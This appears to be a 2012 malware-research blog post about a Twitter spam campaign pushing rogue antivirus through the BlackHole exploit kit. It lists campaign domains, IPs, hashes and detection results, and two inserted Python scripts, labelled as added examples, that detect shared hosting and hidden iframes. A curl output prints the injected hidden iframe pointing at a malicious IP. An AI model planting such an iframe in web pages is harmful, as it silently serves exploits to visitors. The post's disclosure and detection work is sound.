Twitter Spam: Rogue/Scareware Attack

A spam attack is currently underway on Twitter.
Quite a few accounts are compromised and are sending automated messages offering to scan your computer online, via links to .tk domains.

Some examples of these domains, all of which point to the same IP:

faseewq.TK has address 176.57.209.48
fasssqw.TK has address 176.57.209.48
fasvvver.TK has address 176.57.209.48
gamnolt.TK has address 176.57.209.48
huttterw.TK has address 176.57.209.48
nasewr.TK has address 176.57.209.48
nasrew.TK has address 176.57.209.48
saddddre.TK has address 176.57.209.48
salokj.TK has address 176.57.209.48
saqwnbh.TK has address 176.57.209.48
sareqwc.TK has address 176.57.209.48
sasbbert.TK has address 176.57.209.48
sawxqza.TK has address 176.57.209.48
saxuyte.TK has address 176.57.209.48
sexqqwa.TK has address 176.57.209.48
sqwacve.TK has address 176.57.209.48
WEQCVVV.TK has address 176.57.209.48
wqderbbc.TK has address 176.57.209.48
zasehho.TK has address 176.57.209.48
zasqwertf.TK has address 176.57.209.48
zassqwer.TK has address 176.57.209.48
ZASSSRE.TK has address 176.57.209.48

The link leads to a web exploit served by the BlackHole exploit kit.
The dropped file installs the rogue/scareware Security Sphere 2012: http://www3.malekal.com/malwares/index.php?hash=4d01d080a08393088b489b5639240d71

https://www.virustotal.com/file/d5b01fa79bf20f43549331f066b19a27839c2540942d0ed5d44da28bcab77139/analysis/

SHA256: d5b01fa79bf20f43549331f066b19a27839c2540942d0ed5d44da28bcab77139
File name: 4d01d080a08393088b489b5639240d71
Detection ratio: 3 / 42
Analysis date: 2012-04-18 07:18:51 UTC (42 minutes ago)
Kaspersky    Trojan-FakeAV.Win32.Agent.dqs    20120418
McAfee    FakeAlert-SecurityTool.ea    20120418
Panda    Suspicious file    20120417

Then you land on a fake online scan page,
which in the end delivers a setup.exe: http://www3.malekal.com/malwares/index.php?hash=55f4988fd75d414946c821c8838554a3

https://www.virustotal.com/file/454b6242beb9b0443cc7628a7250a4c7b1925dda783fcab383e866074e490053/analysis/
ClamAV    PUA.Packed.ASPack    20120418
Kaspersky    Trojan-FakeAV.Win32.Romeo.dv    20120418
McAfee    FakeAlert-FCG!55F4988FD75D    20120418
McAfee-GW-Edition    FakeAlert-FCG!55F4988FD75D    20120417
NOD32    a variant of Win32/Adware.WintionalityChecker.AF    20120418


This time, we end up with the rogue/scareware Windows Guard Solutions.
It belongs to the family of rogues that has been fairly active for the past few weeks: the name changes every two days.


Rogues/scarewares are as active as ever! Two for the price of one (if your PC is poorly protected).

You will find a procedure for removing these malwares on the following page: https://forum.malekal.com/supprimer-les-rogues-scarewares-t5472.html

A special hello to SecuBox Labs and S!Ri

 

EDIT – SPAM stopped

The domains are down and now lead to parking sites; the spam seems to have stopped.

faseewq.TK has address 93.170.52.30
faseewq.TK has address 93.170.52.20
fasssqw.TK has address 93.170.52.20
fasssqw.TK has address 93.170.52.30
fasvvver.TK has address 93.170.52.30
fasvvver.TK has address 93.170.52.20
gamnolt.TK has address 93.170.52.30
gamnolt.TK has address 93.170.52.20
huttterw.TK has address 93.170.52.30
huttterw.TK has address 93.170.52.20
nasewr.TK has address 93.170.52.30
nasewr.TK has address 93.170.52.20
nasrew.TK has address 93.170.52.20
nasrew.TK has address 93.170.52.30
saddddre.TK has address 93.170.52.20
saddddre.TK has address 93.170.52.30
salokj.TK has address 93.170.52.20
salokj.TK has address 93.170.52.30
saqwnbh.TK has address 93.170.52.20
saqwnbh.TK has address 93.170.52.30
sareqwc.TK has address 93.170.52.30
sareqwc.TK has address 93.170.52.20
sasbbert.TK has address 93.170.52.30
sasbbert.TK has address 93.170.52.20
sawxqza.TK has address 93.170.52.30
sawxqza.TK has address 93.170.52.20
saxuyte.TK has address 93.170.52.20
saxuyte.TK has address 93.170.52.30
sexqqwa.TK has address 93.170.52.20
sexqqwa.TK has address 93.170.52.30
sqwacve.TK has address 93.170.52.30
sqwacve.TK has address 93.170.52.20
WEQCVVV.TK has address 93.170.52.20
WEQCVVV.TK has address 93.170.52.30
wqderbbc.TK has address 93.170.52.30
wqderbbc.TK has address 93.170.52.20
zasehho.TK has address 93.170.52.20
zasehho.TK has address 93.170.52.30
zasqwertf.TK has address 93.170.52.30
zasqwertf.TK has address 93.170.52.20
zassqwer.TK has address 93.170.52.30
zassqwer.TK has address 93.170.52.20
ZASSSRE.TK has address 93.170.52.30
ZASSSRE.TK has address 93.170.52.20

Note that there was also spam using tw1.su addresses; the spam with those addresses continues, but it is less aggressive than the .TK one.
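Both resolution lists above (the live campaign on 176.57.209.48 and, after the takedown, the same names parked on 93.170.52.20/.30) lend themselves to a small script. The following is an added example, not code from the original post or from malekal.com: it parses `host`-style `NAME has address IP` lines, inverts them to find the IPs shared by many throwaway domains (the pivot that ties the .tk list together), and compares two snapshots to report which domains moved, vanished or appeared. The two snapshots embedded in the script are constructed excerpts of the lists above; the NXDOMAIN line is constructed to show that non-matching output is ignored.

```python
"""Pivot on shared hosting from `host` output and diff two snapshots.

Added example, not code from the original post. Input lines are in the
"NAME has address IP" format printed by `host`; anything else (errors,
MX/NS lines) is ignored. The snapshots below are constructed excerpts
of the resolutions shown in the post.
"""
import re
from collections import defaultdict

HOST_LINE = re.compile(
    r"^(?P<name>\S+)\s+has\s+(?:IPv6\s+)?address\s+(?P<ip>[0-9A-Fa-f.:]+)\s*$"
)

# Constructed snapshot 1: the campaign domains all on one exploit-kit IP.
BEFORE = """\
faseewq.TK has address 176.57.209.48
fasssqw.TK has address 176.57.209.48
WEQCVVV.TK has address 176.57.209.48
ZASSSRE.TK has address 176.57.209.48
Host nosuch-example.tk not found: 3(NXDOMAIN)
"""

# Constructed snapshot 2: after the takedown the same names sit on parking
# IPs, and one of them (ZASSSRE.TK) no longer resolves at all.
AFTER = """\
faseewq.TK has address 93.170.52.30
faseewq.TK has address 93.170.52.20
fasssqw.TK has address 93.170.52.20
fasssqw.TK has address 93.170.52.30
WEQCVVV.TK has address 93.170.52.20
WEQCVVV.TK has address 93.170.52.30
"""


def parse_host_output(text):
    """Return {domain: set(ips)}; names are lowercased so WEQCVVV.TK and
    weqcvvv.tk collapse to one key, which is how DNS treats them."""
    results = defaultdict(set)
    for line in text.splitlines():
        m = HOST_LINE.match(line.strip())
        if m:
            results[m.group("name").lower().rstrip(".")].add(m.group("ip"))
    return dict(results)


def group_by_ip(resolutions):
    """Invert to {ip: sorted domains} so shared infrastructure stands out."""
    by_ip = defaultdict(set)
    for name, ips in resolutions.items():
        for ip in ips:
            by_ip[ip].add(name)
    return {ip: sorted(names) for ip, names in by_ip.items()}


def shared_infrastructure(resolutions, min_domains=2):
    """IPs hosting at least `min_domains` distinct names: candidate pivots
    to block, or to feed into passive-DNS queries for sibling domains."""
    return {ip: names for ip, names in group_by_ip(resolutions).items()
            if len(names) >= min_domains}


def diff_snapshots(before, after):
    """Classify each domain as 'same', 'moved', 'gone' or 'new' between runs."""
    report = {}
    for name in sorted(set(before) | set(after)):
        if name not in after:
            report[name] = "gone"
        elif name not in before:
            report[name] = "new"
        elif before[name] == after[name]:
            report[name] = "same"
        else:
            report[name] = "moved"
    return report


if __name__ == "__main__":
    before, after = parse_host_output(BEFORE), parse_host_output(AFTER)
    for ip, names in shared_infrastructure(before).items():
        print(f"{ip}: {len(names)} domains -> {', '.join(names)}")
    for name, status in diff_snapshots(before, after).items():
        print(f"{name}: {status} -> {sorted(after.get(name, []))}")
```

In practice you would pipe `for d in $(cat domains.txt); do host "$d"; done` into the parser on two different days; a block list built from the "before" IPs keeps working after the move, while the parking IPs are shared with plenty of harmless domains and should not be blocked on their own.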

 

EDIT – It continues

VITEDDA.TK has address 77.222.40.167
WINLOCKKKK.TK has address 77.222.40.167
malekalmorte@MaK-tux:/tmp$ curl -s WINLOCKKKK.TK
<iframe src="//23.19.232.6/main.php?page=1ccc62b1af0f8582" width="3" height="3" align="left"></iframe>

The whole page body is a single 3x3 pixel iframe that silently loads main.php from 23.19.232.6.
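A scanner for exactly that pattern, as an added example (not code from the post): it walks the iframes in a fetched HTML document and flags those that are tiny, hidden by CSS, or whose src host is an IP literal rather than a hostname. The sample page embedded below is constructed around the iframe from the curl output above, with one ordinary-sized frame added for contrast.

```python
"""Flag tiny or hidden iframes, and iframes pointing at bare-IP hosts.

Added example, not code from the original post. The heuristics mirror
the injected frame seen above: 3x3 pixels, src on an IP literal. The
sample HTML is constructed; only the first iframe is the real one.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

MAX_PIXELS = 10  # frames this small on both sides are effectively invisible

# Constructed page: the campaign iframe plus a benign, normally sized frame.
SAMPLE_PAGE = """<html><body>
<p>Parked domain</p>
<iframe src="//23.19.232.6/main.php?page=1ccc62b1af0f8582" width="3" height="3" align="left"></iframe>
<iframe src="https://example.com/embed/video" width="560" height="315"></iframe>
</body></html>"""


def _px(value):
    """Parse '3', '3px' or '3%' into an int; None when absent or not numeric."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def _host_is_ip(src):
    """True when the src URL names its host by IP literal (v4 or v6)."""
    host = urlsplit(src).hostname  # handles scheme-relative '//1.2.3.4/x'
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class IframeScanner(HTMLParser):
    """Collects one finding per iframe that trips at least one heuristic."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = (a.get("style") or "").replace(" ", "").lower()
        reasons = []
        if w is not None and h is not None and w <= MAX_PIXELS and h <= MAX_PIXELS:
            reasons.append(f"tiny frame {w}x{h}")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        if _host_is_ip(src):
            reasons.append("src host is an IP literal")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def scan_html(html):
    """Return a list of {'src', 'reasons'} dicts for suspicious iframes."""
    parser = IframeScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding["src"], "->", "; ".join(finding["reasons"]))
```

The same checks translate directly into a proxy or IDS rule; the IP-literal test alone would not have caught a later campaign that moved the landing page behind a hostname, which is why size and CSS visibility are checked independently.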

EDIT – Kaspersky has blogged about it: http://www.securelist.com/en/blog/208193477/New_Spam_campaign_on_Twitter_Leads_to_Rogue_AV

 

EDIT – 27 July

A new campaign pushing Live Security Platinum through a BlackHole exploit
=> http://www3.malekal.com/malwares/index.php?domaine=184.82.60.172
